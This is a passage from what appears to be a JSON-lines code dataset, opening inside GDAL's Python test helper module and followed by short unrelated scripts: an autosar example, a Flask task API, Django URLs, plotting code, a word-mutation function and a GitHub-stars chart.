corrupt.' % sf)\n print(md1)\n print(md2)\n return 0\n\n for cf in coef_fields:\n\n try:\n list1 = md1[cf].split()\n list2 = md2[cf].split()\n\n except:\n post_reason('%s value missing or corrupt.' % cf)\n print(md1[cf])\n print(md2[cf])\n return 0\n\n if len(list1) != 20:\n post_reason('%s value list length wrong(1)' % cf)\n print(list1)\n return 0\n\n if len(list2) != 20:\n post_reason('%s value list length wrong(2)' % cf)\n print(list2)\n return 0\n\n for i in range(20):\n if not approx_equal(float(list1[i]), float(list2[i])):\n post_reason('%s[%d] values differ.' 
% (cf, i))\n print(list1[i], list2[i])\n return 0\n\n return 1\n\n###############################################################################\n# Test if geotransforms are equal with an epsilon tolerance\n#\n\n\ndef geotransform_equals(gt1, gt2, gt_epsilon):\n for i in range(6):\n if abs(gt1[i] - gt2[i]) > gt_epsilon:\n print('')\n print('gt1 = ', gt1)\n print('gt2 = ', gt2)\n post_reason('Geotransform differs.')\n return False\n return True\n\n\n###############################################################################\n# Download file at url 'url' and put it as 'filename' in 'tmp/cache/'\n#\n# If 'filename' already exits in 'tmp/cache/', it is not downloaded\n# If GDAL_DOWNLOAD_TEST_DATA is not defined, the function fails\n# If GDAL_DOWNLOAD_TEST_DATA is defined, 'url' is downloaded as 'filename' in 'tmp/cache/'\n\ndef download_file(url, filename=None, download_size=-1, force_download=False, max_download_duration=None, base_dir='tmp/cache'):\n\n if filename is None:\n filename = os.path.basename(url)\n elif filename.startswith(base_dir + '/'):\n filename = filename[len(base_dir + '/'):]\n\n try:\n os.stat(base_dir + '/' + filename)\n return True\n except OSError:\n if force_download or download_test_data():\n val = None\n start_time = time.time()\n try:\n handle = gdalurlopen(url)\n if handle is None:\n return False\n if download_size == -1:\n try:\n handle_info = handle.info()\n download_size = int(handle_info['content-length'])\n print('Downloading %s (length = %d bytes)...' % (url, download_size))\n except:\n print('Downloading %s...' % (url))\n else:\n print('Downloading %d bytes from %s...' % (download_size, url))\n except:\n return False\n\n if download_size >= 0:\n sys.stdout.write('Progress: ')\n nLastTick = -1\n val = ''.encode('ascii')\n while len(val) < download_size or download_size < 0:\n chunk_size = 1024\n if download_size >= 0 and len(val) + chunk_size > download_size:\n chunk_size = download_size - len(val)\n try:\n chunk = handle.read(chunk_size)\n except:\n print('Did not get expected data length.')\n return False\n if len(chunk) < chunk_size:\n if download_size < 0:\n break\n print('Did not get expected data length.')\n return False\n val = val + chunk\n if download_size >= 0:\n nThisTick = int(40 * len(val) / download_size)\n while nThisTick > nLastTick:\n nLastTick = nLastTick + 1\n if nLastTick % 4 == 0:\n sys.stdout.write(\"%d\" % int((nLastTick / 4) * 10))\n else:\n sys.stdout.write(\".\")\n nLastTick = nThisTick\n if nThisTick == 40:\n sys.stdout.write(\" - done.\\n\")\n\n current_time = time.time()\n if max_download_duration is not None and current_time - start_time > max_download_duration:\n print('Download aborted due to timeout.')\n return False\n\n try:\n os.stat(base_dir)\n except OSError:\n os.mkdir(base_dir)\n\n try:\n open(base_dir + '/' + filename, 'wb').write(val)\n return True\n except IOError:\n print('Cannot write %s' % (filename))\n return False\n else:\n return False\n\n\n###############################################################################\n# GDAL data type to python struct format\ndef gdal_data_type_to_python_struct_format(datatype):\n type_char = 'B'\n if datatype == gdal.GDT_Int16:\n type_char = 'h'\n elif datatype == gdal.GDT_UInt16:\n type_char = 'H'\n elif datatype == gdal.GDT_Int32:\n type_char = 'i'\n elif datatype == gdal.GDT_UInt32:\n type_char = 'I'\n elif datatype == gdal.GDT_Float32:\n type_char = 'f'\n elif datatype == gdal.GDT_Float64:\n type_char = 'd'\n return 
type_char\n\n###############################################################################\n# Compare the values of the pixels\n\n\ndef compare_ds(ds1, ds2, xoff=0, yoff=0, width=0, height=0, verbose=1):\n import struct\n\n if width == 0:\n width = ds1.RasterXSize\n if height == 0:\n height = ds1.RasterYSize\n data1 = ds1.GetRasterBand(1).ReadRaster(xoff, yoff, width, height)\n type_char = gdal_data_type_to_python_struct_format(ds1.GetRasterBand(1).DataType)\n val_array1 = struct.unpack(type_char * width * height, data1)\n\n data2 = ds2.GetRasterBand(1).ReadRaster(xoff, yoff, width, height)\n type_char = gdal_data_type_to_python_struct_format(ds2.GetRasterBand(1).DataType)\n val_array2 = struct.unpack(type_char * width * height, data2)\n\n maxdiff = 0.0\n ndiffs = 0\n for i in range(width * height):\n diff = val_array1[i] - val_array2[i]\n if diff != 0:\n # print(val_array1[i])\n # print(val_array2[i])\n ndiffs = ndiffs + 1\n if abs(diff) > maxdiff:\n maxdiff = abs(diff)\n if verbose:\n print(\"Diff at pixel (%d, %d) : %f\" % (i % width, i / width, float(diff)))\n elif ndiffs < 10:\n if verbose:\n print(\"Diff at pixel (%d, %d) : %f\" % (i % width, i / width, float(diff)))\n if maxdiff != 0 and verbose:\n print(\"Max diff : %d\" % (maxdiff))\n print(\"Number of diffs : %d\" % (ndiffs))\n\n return maxdiff\n\n\n###############################################################################\n# Deregister all JPEG2000 drivers, except the one passed as an argument\n\ndef deregister_all_jpeg2000_drivers_but(name_of_driver_to_keep):\n global jp2kak_drv, jpeg2000_drv, jp2ecw_drv, jp2mrsid_drv, jp2openjpeg_drv, jp2lura_drv\n global jp2kak_drv_unregistered, jpeg2000_drv_unregistered, jp2ecw_drv_unregistered, jp2mrsid_drv_unregistered, jp2openjpeg_drv_unregistered, jp2lura_drv_unregistered\n\n # Deregister other potential conflicting JPEG2000 drivers that will\n # be re-registered in the cleanup\n jp2kak_drv = gdal.GetDriverByName('JP2KAK')\n if name_of_driver_to_keep != 'JP2KAK' and jp2kak_drv:\n gdal.Debug('gdaltest', 'Deregistering JP2KAK')\n jp2kak_drv.Deregister()\n jp2kak_drv_unregistered = True\n\n jpeg2000_drv = gdal.GetDriverByName('JPEG2000')\n if name_of_driver_to_keep != 'JPEG2000' and jpeg2000_drv:\n gdal.Debug('gdaltest', 'Deregistering JPEG2000')\n jpeg2000_drv.Deregister()\n jpeg2000_drv_unregistered = True\n\n jp2ecw_drv = gdal.GetDriverByName('JP2ECW')\n if name_of_driver_to_keep != 'JP2ECW' and jp2ecw_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2ECW')\n jp2ecw_drv.Deregister()\n jp2ecw_drv_unregistered = True\n\n jp2mrsid_drv = gdal.GetDriverByName('JP2MrSID')\n if name_of_driver_to_keep != 'JP2MrSID' and jp2mrsid_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2MrSID')\n jp2mrsid_drv.Deregister()\n jp2mrsid_drv_unregistered = True\n\n jp2openjpeg_drv = gdal.GetDriverByName('JP2OpenJPEG')\n if name_of_driver_to_keep != 'JP2OpenJPEG' and jp2openjpeg_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2OpenJPEG')\n jp2openjpeg_drv.Deregister()\n jp2openjpeg_drv_unregistered = True\n\n jp2lura_drv = gdal.GetDriverByName('JP2Lura')\n if name_of_driver_to_keep != 'JP2Lura' and jp2lura_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2Lura')\n jp2lura_drv.Deregister()\n jp2lura_drv_unregistered = True\n\n return True\n\n###############################################################################\n# Re-register all JPEG2000 drivers previously disabled by\n# deregister_all_jpeg2000_drivers_but\n\n\ndef reregister_all_jpeg2000_drivers():\n global jp2kak_drv, jpeg2000_drv, jp2ecw_drv, 
jp2mrsid_drv, jp2openjpeg_drv, jp2lura_drv\n global jp2kak_drv_unregistered, jpeg2000_drv_unregistered, jp2ecw_drv_unregistered, jp2mrsid_drv_unregistered, jp2openjpeg_drv_unregistered, jp2lura_drv_unregistered\n\n if jp2kak_drv_unregistered:\n jp2kak_drv.Register()\n jp2kak_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2KAK')\n\n if jpeg2000_drv_unregistered:\n jpeg2000_drv.Register()\n jpeg2000_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JPEG2000')\n\n if jp2ecw_drv_unregistered:\n jp2ecw_drv.Register()\n jp2ecw_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2ECW')\n\n if jp2mrsid_drv_unregistered:\n jp2mrsid_drv.Register()\n jp2mrsid_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2MrSID')\n\n if jp2openjpeg_drv_unregistered:\n jp2openjpeg_drv.Register()\n jp2openjpeg_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2OpenJPEG')\n\n if jp2lura_drv_unregistered:\n jp2lura_drv.Register()\n jp2lura_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2Lura')\n\n return True\n\n###############################################################################\n# Determine if the filesystem supports sparse files.\n# Currently, this will only work on Linux (or any *NIX that has the stat\n# command line utility)\n\n\ndef filesystem_supports_sparse_files(path):\n\n if skip_on_travis():\n return False\n\n try:\n (ret, err) = runexternal_out_and_err('stat -f -c \"%T\" ' + path)\n except OSError:\n return False\n\n if err != '':\n post_reason('Cannot determine if filesystem supports sparse files')\n return False\n\n if ret.find('fat32') != -1:\n post_reason('File system does not support sparse files')\n return False\n\n if ret.find('wslfs') != -1 or \\\n ret.find('0x53464846') != -1: # wslfs for older stat versions\n post_reason('Windows Subsystem for Linux FS is at the time of ' +\n 'writing not known to support sparse files')\n return False\n\n # Add here any missing filesystem supporting sparse files\n # See http://en.wikipedia.org/wiki/Comparison_of_file_systems\n if ret.find('ext3') == -1 and \\\n ret.find('ext4') == -1 and \\\n ret.find('reiser') == -1 and \\\n ret.find('xfs') == -1 and \\\n ret.find('jfs') == -1 and \\\n ret.find('zfs') == -1 and \\\n ret.find('ntfs') == -1:\n post_reason('Filesystem %s is not believed to support sparse files' % ret)\n return False\n\n return True\n\n###############################################################################\n# Unzip a file\n\n\ndef unzip(target_dir, zipfilename, verbose=False):\n\n try:\n import zipfile\n zf = zipfile.ZipFile(zipfilename)\n except ImportError:\n os.system('unzip -d ' + target_dir + ' ' + zipfilename)\n return\n\n for filename in zf.namelist():\n if verbose:\n print(filename)\n outfilename = os.path.join(target_dir, filename)\n if filename.endswith('/'):\n if not os.path.exists(outfilename):\n os.makedirs(outfilename)\n else:\n outdirname = os.path.dirname(outfilename)\n if not os.path.exists(outdirname):\n os.makedirs(outdirname)\n\n outfile = open(outfilename, 'wb')\n outfile.write(zf.read(filename))\n outfile.close()\n\n return\n\n\nisnan = math.isnan\n\n###############################################################################\n# Return NaN\n\ndef NaN():\n return float('nan')\n\n###############################################################################\n# Return positive infinity\n\n\ndef posinf():\n return float('inf')\n\n###############################################################################\n# Return 
negative infinity\n\n\ndef neginf():\n    return float('-inf')\n\n###############################################################################\n# Has the user requested to download test data\ndef download_test_data():\n    global count_skipped_tests_download\n    val = gdal.GetConfigOption('GDAL_DOWNLOAD_TEST_DATA', None)\n    if val != 'yes' and val != 'YES':\n\n        if count_skipped_tests_download == 0:\n            print('As the GDAL_DOWNLOAD_TEST_DATA environment variable is not set to YES, some tests relying on data to be downloaded from the Web will be skipped')\n            count_skipped_tests_download = count_skipped_tests_download + 1\n\n        return False\n    return True\n\n###############################################################################\n# Has the user requested to run the slow tests\ndef run_slow_tests():\n    global count_skipped_tests_slow\n    val = gdal.GetConfigOption('GDAL_RUN_SLOW_TESTS', None)\n    if val != 'yes' and val != 'YES':\n\n        if count_skipped_tests_slow == 0:\n            print('As the GDAL_RUN_SLOW_TESTS environment variable is not set to YES, some \"slow\" tests will be skipped')\n            count_skipped_tests_slow = count_skipped_tests_slow + 1\n\n        return False\n    return True\n\n###############################################################################\n# Return true if the platform supports symlinks\n\n\ndef support_symlink():\n    if sys.platform.startswith('linux'):\n        return True\n    if sys.platform.find('freebsd') != -1:\n        return True\n    if sys.platform == 'darwin':\n        return True\n    if sys.platform.find('sunos') != -1:\n        return True\n    return False\n\n###############################################################################\n# Return True if the test must be skipped\n\n\ndef skip_on_travis():\n    val = gdal.GetConfigOption('TRAVIS', None)\n    if val is not None:\n        post_reason('Test skipped on Travis')\n        return True\n    return False\n\n###############################################################################\n# Return True if the provided name is in TRAVIS_BRANCH or BUILD_NAME\n\n\ndef is_travis_branch(name):\n    if 'TRAVIS_BRANCH' in os.environ:\n        val = os.environ['TRAVIS_BRANCH']\n        if name in val:\n            return True\n    if 'BUILD_NAME' in os.environ:\n        val = os.environ['BUILD_NAME']\n        if name in val:\n            return True\n    return False\n\n###############################################################################\n# find_lib_linux()\n# Parse /proc/self/maps to find an occurrence of libXXXXX.so.*\n\n\ndef find_lib_linux(libname):\n\n    f = open('/proc/self/maps')\n    lines = f.readlines()\n    f.close()\n\n    for line in lines:\n        if line.rfind('/lib' + libname) == -1 or line.find('.so') == -1:\n            continue\n\n        i = line.find(' ')\n        if i < 0:\n            continue\n        line = line[i + 1:]\n        i = line.find(' ')\n        if i < 0:\n            continue\n        line = line[i + 1:]\n        i = line.find(' ')\n        if i < 0:\n            continue\n        line = line[i + 1:]\n        i = line.find(' ')\n        if i < 0:\n            continue\n        line = line[i + 1:]\n        i = line.find(' ')\n        if i < 0:\n            continue\n        line = line[i + 1:]\n\n        soname = line.lstrip().rstrip('\\n')\n        if soname.rfind('/lib' + libname) == -1:\n            continue\n\n        return soname\n\n    return None\n\n###############################################################################\n# find_lib_sunos()\n# Parse output of pmap to find an occurrence of libXXX.so.*\n\n\ndef find_lib_sunos(libname):\n\n    pid = os.getpid()\n    lines, _ = runexternal_out_and_err('pmap %d' % pid)\n\n    for line in lines.split('\\n'):\n        if line.rfind('/lib' + libname) == -1 or line.find('.so') == -1:\n            continue\n\n        i = line.find('/')\n        if i < 0:\n            continue\n        line = line[i:]\n\n        soname = 
line.lstrip().rstrip('\\n')\n        if soname.rfind('/lib' + libname) == -1:\n            continue\n\n        return soname\n\n    return None\n\n###############################################################################\n# find_lib_windows()\n# use Module32First() / Module32Next() API on the current process\n\n\ndef find_lib_windows(libname):\n\n    try:\n        import ctypes\n    except ImportError:\n        return None\n\n    kernel32 = ctypes.windll.kernel32\n\n    MAX_MODULE_NAME32 = 255\n    MAX_PATH = 260\n\n    TH32CS_SNAPMODULE = 0x00000008\n\n    class MODULEENTRY32(ctypes.Structure):\n        _fields_ = [\n            (\"dwSize\", ctypes.c_int),\n            (\"th32ModuleID\", ctypes.c_int),\n            (\"th32ProcessID\", ctypes.c_int),\n            (\"GlblcntUsage\", ctypes.c_int),\n            (\"ProccntUsage\", ctypes.c_int),\n            (\"modBaseAddr\", ctypes.c_char_p),\n            (\"modBaseSize\", ctypes.c_int),\n            (\"hModule\", ctypes.c_void_p),\n            (\"szModule\", ctypes.c_char * (MAX_MODULE_NAME32 + 1)),\n            (\"szExePath\", ctypes.c_char * MAX_PATH)\n        ]\n\n    # declare argument and return types for the Win32 API calls\n    Module32First = kernel32.Module32First\n    Module32First.argtypes = [ctypes.c_void_p, ctypes.POINTER(MODULEENTRY32)]\n    Module32First.restype = ctypes.c_int\n\n    Module32Next = kernel32.Module32Next\n    Module32Next.argtypes = [ctypes.c_void_p, ctypes.POINTER(MODULEENTRY32)]\n    Module32Next.restype = ctypes.c_int\n\n    CreateToolhelp32Snapshot = kernel32.CreateToolhelp32Snapshot\n    CreateToolhelp32Snapshot.argtypes = [ctypes.c_int, ctypes.c_int]\n    CreateToolhelp32Snapshot.restype = ctypes.c_void_p\n\n    CloseHandle = kernel32.CloseHandle\n    CloseHandle.argtypes = [ctypes.c_void_p]\n    CloseHandle.restype = ctypes.c_int\n\n    GetLastError = kernel32.GetLastError\n    GetLastError.argtypes = []\n    GetLastError.restype = ctypes.c_int\n\n    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0)\n    if snapshot is None:\n        return None\n\n    soname = None\n\n    i = 0\n    while True:\n        entry = MODULEENTRY32()\n        entry.dwSize = ctypes.sizeof(MODULEENTRY32)\n        pentry = ctypes.pointer(entry)\n        if i == 0:\n            ret = Module32First(snapshot, pentry)\n        else:\n            ret = Module32Next(snapshot, pentry)\n        i = i + 1\n        if ret == 0:\n            break\n\n        try:\n            path = entry.szExePath.decode('latin1')\n        except:\n            continue\n\n        # use a separate variable here so the module iteration counter i is not clobbered\n        j = path.rfind('\\\\' + libname)\n        if j < 0:\n            continue\n        if path[j + 1:].find('\\\\') >= 0:\n            continue\n        # Avoid matching gdal_PLUGIN.dll\n        if path[j + 1:].find('_') >= 0:\n            continue\n        soname = path\n        break\n\n    CloseHandle(snapshot)\n\n    return soname\n\n###############################################################################\n# find_lib()\n\n\ndef find_lib(mylib):\n    if sys.platform.startswith('linux'):\n        return find_lib_linux(mylib)\n    if sys.platform.startswith('sunos'):\n        return find_lib_sunos(mylib)\n    if sys.platform.startswith('win32'):\n        return find_lib_windows(mylib)\n    # sorry mac users or other BSDs\n    # should be doable\n    return None\n\n###############################################################################\n# get_opened_files()\n\n\nget_opened_files_has_warned = False\n\n\ndef get_opened_files():\n    if not sys.platform.startswith('linux'):\n        return []\n    fdpath = '/proc/%d/fd' % os.getpid()\n    if not os.path.exists(fdpath):\n        global get_opened_files_has_warned\n        if not get_opened_files_has_warned:\n            get_opened_files_has_warned = True\n            print('get_opened_files() not supported due to /proc not being readable')\n        return []\n    file_numbers = os.listdir(fdpath)\n    filenames = []\n    for fd in file_numbers:\n        try:\n            filename = os.readlink('%s/%s' % (fdpath, fd))\n            if not filename.startswith('/dev/') and not filename.startswith('pipe:') and filename.find('proj.db') < 0:\n                
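# remember the resolved target of this file descriptor (device nodes, pipes, and PROJ's database were excluded above)\n                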
filenames.append(filename)\n except OSError:\n pass\n return filenames\n\n###############################################################################\n# is_file_open()\n\n\ndef is_file_open(filename):\n for got_filename in get_opened_files():\n if filename in got_filename:\n return True\n return False\n\n###############################################################################\n# built_against_curl()\n\n\ndef built_against_curl():\n return gdal.GetDriverByName('HTTP') is not None\n\n###############################################################################\n# error_handler()\n# Allow use of \"with\" for an ErrorHandler that always pops at the scope close.\n# Defaults to suppressing errors and warnings.\n\n\n@contextlib.contextmanager\ndef error_handler(error_name='CPLQuietErrorHandler'):\n handler = gdal.PushErrorHandler(error_name)\n try:\n yield handler\n finally:\n gdal.PopErrorHandler()\n\n###############################################################################\n# Temporarily define a new value of block cache\n\n\n@contextlib.contextmanager\ndef SetCacheMax(val):\n oldval = gdal.GetCacheMax()\n gdal.SetCacheMax(val)\n try:\n yield\n finally:\n gdal.SetCacheMax(oldval)\n\n###############################################################################\n# Temporarily define a configuration option\n\n\n@contextlib.contextmanager\ndef config_option(key, val):\n oldval = gdal.GetConfigOption(key)\n gdal.SetConfigOption(key, val)\n try:\n yield\n finally:\n gdal.SetConfigOption(key, oldval)\n\n###############################################################################\n# Temporarily define a set of configuration options\n\n\n@contextlib.contextmanager\ndef config_options(options):\n oldvals = {key: gdal.GetConfigOption(key) for key in options}\n for key in options:\n gdal.SetConfigOption(key, options[key])\n try:\n yield\n finally:\n for key in options:\n gdal.SetConfigOption(key, oldvals[key])\n\n###############################################################################\n# Temporarily create a file\n\n\n@contextlib.contextmanager\ndef tempfile(filename, content):\n gdal.FileFromMemBuffer(filename, content)\n try:\n yield\n finally:\n gdal.Unlink(filename)\n\n###############################################################################\n# Temporarily enable exceptions\n\n\n@contextlib.contextmanager\ndef enable_exceptions():\n if gdal.GetUseExceptions():\n try:\n yield\n finally:\n pass\n return\n\n gdal.UseExceptions()\n try:\n yield\n finally:\n gdal.DontUseExceptions()\n\n\n###############################################################################\nrun_func = gdaltestaux.run_func\nurlescape = gdaltestaux.urlescape\ngdalurlopen = gdaltestaux.gdalurlopen\nspawn_async = gdaltestaux.spawn_async\nwait_process = gdaltestaux.wait_process\nrunexternal = gdaltestaux.runexternal\nread_in_thread = gdaltestaux.read_in_thread\nrunexternal_out_and_err = gdaltestaux.runexternal_out_and_err\n","sub_path":"autotest/pymod/gdaltest.py","file_name":"gdaltest.py","file_ext":"py","file_size_in_byte":58642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315198664","text":"import autosar\r\n\r\nws = autosar.workspace()\r\npackage=ws.createPackage(\"DataType\", role=\"DataType\")\r\npackage.createSubPackage('DataTypeSemantics', role='CompuMethod')\r\npackage.createSubPackage('DataTypeUnits', role='Unit')\r\npackage.createIntegerDataType('InactiveActive_T',valueTable=[\r\n 'InactiveActive_Inactive',\r\n 
'InactiveActive_Active',\r\n    'InactiveActive_Error',\r\n    'InactiveActive_NotAvailable'])\r\n\r\nws.saveXML('DataTypes.arxml', packages=['DataType'])\r\n\r\nws2 = autosar.workspace()\r\nws2.loadXML('DataTypes.arxml')\r\nprint(ws2['DataType/InactiveActive_T'].name)","sub_path":"examples/autosar3/package/enum_integer_type.py","file_name":"enum_integer_type.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"348384759","text":"from flask import request, url_for\nfrom flask_restful import Resource\nfrom data.models import db, Task, TaskSchema\nfrom utils.settings import API_ITEMS_PER_PAGE\n\n\ntasks_schema = TaskSchema(many=True)\ntask_schema = TaskSchema()\n\n\nclass ListCreateTask(Resource):\n    def get(self):\n        # Get the total count of tasks\n        count = len(Task.query.all())\n\n        # Get the page parameter from URL if present\n        args = request.args\n        if args:\n            page = args.get('page', 1, type=int)\n\n            # Returns API_ITEMS_PER_PAGE items per page\n            # 3rd arg sets error_out to False\n            paginated_tasks = Task.query.paginate(page, API_ITEMS_PER_PAGE, False)\n\n            # serializing the Task items\n            results = tasks_schema.dump(paginated_tasks.items)\n\n            \"\"\"\n            Getting the next and previous urls by checking and setting the next and previous page num\n            has_next ==> True if next page exists\n            has_prev ==> True if previous page exists\n            next_num ==> number of the next page\n            prev_num ==> number of the previous page\n            \"\"\"\n            next_url = url_for('api_bp.tasks', page=paginated_tasks.next_num) \\\n                if paginated_tasks.has_next else None\n\n            prev_url = url_for('api_bp.tasks', page=paginated_tasks.prev_num) \\\n                if paginated_tasks.has_prev else None\n\n            # Getting the total number of pages\n            total_pages = paginated_tasks.pages\n\n            return {'count': count, 'pages': total_pages, 'next': next_url, 'prev': prev_url, 'results': results}, 200\n\n        \"\"\"\n        If no page arg present in the URL,\n        set the default page to 1 and paginate the results\n        \"\"\"\n        page = 1\n        tasks = Task.query.paginate(page, API_ITEMS_PER_PAGE, False)\n        # serializing the Tasks\n        results = tasks_schema.dump(tasks.items)\n\n        next_url = url_for('api_bp.tasks', page=tasks.next_num) \\\n            if tasks.has_next else None\n\n        prev_url = url_for('api_bp.tasks', page=tasks.prev_num) \\\n            if tasks.has_prev else None\n\n        total_pages = tasks.pages\n\n        return {'count': count, 'pages': total_pages, 'next': next_url, 'prev': prev_url, 'results': results}, 200\n\n    def post(self):\n        request_data = request.get_json(force=True)\n        # print(request_data)\n        if not request_data:\n            return {'message': 'post body required'}, 400\n\n        # validate input\n        errors = task_schema.validate(request_data)\n        # print(errors)\n        if errors:\n            return errors, 422\n\n        task = Task.query.filter_by(name=request_data['name']).first()\n        if task:\n            return {'message': 'A task with name {} already exists'.format(request_data['name'])}, 400\n\n        new_task = Task(**request_data)\n        db.session.add(new_task)\n        db.session.commit()\n\n        result = task_schema.dump(new_task)\n\n        return result, 201\n\n","sub_path":"resources/ListCreateTask.py","file_name":"ListCreateTask.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"439903228","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom blogapp import views\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', views.index, name='index'),\n    
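# URL patterns are matched in order; note that the 'blog/' prefix is also mounted again via include() below\n    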
path('blog/', views.detail, name='detail'),\n path('blog/new/', views.new, name='new'),\n path('blog/create/', views.create, name='create'),\n path('blog/', include('blogapp.urls')),\n]\n","sub_path":"blogproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347459098","text":"#!/usr/bin/python\n\nimport sys, os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import log\n\nplt.rcParams.update({'font.size': 14})\n\nfilename = sys.argv[1]\n\nfile1 = open(filename, 'r') \nLines = file1.readlines() \n\nfor line in Lines: \n line_curr = line.strip()\n #print(line_curr)\n\nfib_ref=Lines[1:2]\nfib_adapt=Lines[3:12]\nfib_discrete=Lines[13:23]\n\n#print(fib_ref)\n#print(fib_adapt)\n#print(fib_discrete)\n\nUref = fib_ref[0].strip().split()[0];\n#print(Uref)\n\nU_adapt = np.array([])\nt_adapt = np.array([])\nt_adapt2 = np.array([])\n\nfac = 1.0/log(10);\n\nfor line in fib_adapt:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU_adapt = np.append(U_adapt,[abs(float(U)-float(Uref))])\n\t\tt_adapt = np.append(t_adapt,[float(t)])\n\t\tt_adapt2 = np.append(t_adapt2,[float(ts)])\n\nU_discrete = np.array([])\nt_discrete = np.array([])\nt_discrete2 = np.array([])\n\nfor line in fib_discrete:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU_discrete = np.append(U_discrete,[abs(float(U)-float(Uref))])\n\t\tt_discrete = np.append(t_discrete,[float(t)])\n\t\tt_discrete2 = np.append(t_discrete2,[float(ts)])\n\n\n#######################\n\nfilename = sys.argv[2]\n\nfile1 = open(filename, 'r') \nLines = file1.readlines() \n\nfor line in Lines: \n line_curr = line.strip()\n #print(line_curr)\n\nfib2_ref=Lines[1:2]\nfib2_adapt=Lines[3:12]\nfib2_discrete=Lines[13:23]\n\n#print(fib_ref)\n#print(fib_adapt)\n#print(fib_discrete)\n\nUref = fib2_ref[0].strip().split()[0];\n#print(Uref)\n\nU2_adapt = np.array([])\nt2_adapt = np.array([])\nt2_adapt2 = np.array([])\n\nfor line in fib2_adapt:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU2_adapt = np.append(U2_adapt,[abs(float(U)-float(Uref))])\n\t\tt2_adapt = np.append(t2_adapt,[float(t)])\n\t\tt2_adapt2 = np.append(t2_adapt2,[float(ts)])\n\nU2_discrete = np.array([])\nt2_discrete = np.array([])\nt2_discrete2 = np.array([])\n\nfor line in fib2_discrete:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU2_discrete = np.append(U2_discrete,[abs(float(U)-float(Uref))])\n\t\tt2_discrete = np.append(t2_discrete,[float(t)])\n\t\tt2_discrete2 = np.append(t2_discrete2,[float(ts)])\n\n\n\nef = r'$\\epsilon_f=|(U/U_{ref})-1|$'\n#######################\nfig = plt.figure()\n\nplt.xlabel(\"Error fraction \"+ef, fontsize=20)\nplt.ylabel(\"Computation time (sec)\", fontsize=20)\nplt.xscale(\"log\", nonposx='clip')\nplt.yscale(\"log\", nonposy='clip')\nplt.xlim([10**(-19),10**9])\nplt.ylim([10**(-6),10**3])\n\nplt.errorbar(U_adapt, t_adapt, fmt = 'rs', markersize=5, markerfacecolor='none', yerr=t_adapt2, label=r'$\\theta = 0 \\degree$ (fibren)')\nplt.errorbar(U_discrete, t_discrete, fmt = 'bo', markersize=5, markerfacecolor='none', yerr=t_discrete2, label=r'$\\theta = 0 \\degree$ (discrete)')\nplt.errorbar(U2_adapt, t2_adapt, fmt = 'rs', markersize=5, yerr=t2_adapt2, label=r'$\\theta = 30 \\degree$ 
(fibren)')\nplt.errorbar(U2_discrete, t2_discrete, fmt = 'bo', markersize=5, yerr=t2_discrete2, label=r'$\\theta = 30 \\degree$ (discrete)')\nplt.grid(linestyle='-', linewidth='0.1', color='black')\nplt.legend(loc=3)\n\nplt.savefig(\"plot_discrete.eps\", format=\"eps\", bbox_inches='tight')\n#cmd2 = \"inkscape outfile.svg --export-pdf=errtime.pdf\"\n#os.system(cmd2)\n","sub_path":"plot_errtime.py","file_name":"plot_errtime.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372716660","text":"import random\r\n\r\ndef mutateWord(word):\r\n\tindex_modification = int(random.random() * len(word))\r\n\tif (index_modification == 0):\r\n\t\tword = chr(97 + int(26 * random.random())) + word[1:]\r\n\telse:\r\n\t\tword = word[:index_modification] + chr(97 + int(26 * random.random())) + word[index_modification+1:]\r\n\treturn word\r\n\t\r\ndef mutatePopulation(population, chance_of_mutation):\r\n\tfor i in range(len(population)):\r\n\t\tif random.random() * 100 < chance_of_mutation:\r\n\t\t\tpopulation[i] = mutateWord(population[i])\r\n\treturn population","sub_path":"mutate.py","file_name":"mutate.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"46540634","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS,LightenStyle as LS\n\n\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\nr = requests.get(url)\nprint('response:' ,r.status_code)\n\nresponse_dict = r.json() # the API response, parsed from JSON and stored in a variable\nprint('total_count:',response_dict['total_count'])\n\nresp_dicts = response_dict['items']\nprint('responses return:',len(resp_dicts))\n\nname,starts = [],[] # create two empty lists to hold the information shown in the chart\nfor resp_dict in resp_dicts:\n    name.append(resp_dict['name'])\n    starts.append(resp_dict['stargazers_count'])\n\nmy_style = LS('#333366',base_style = LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 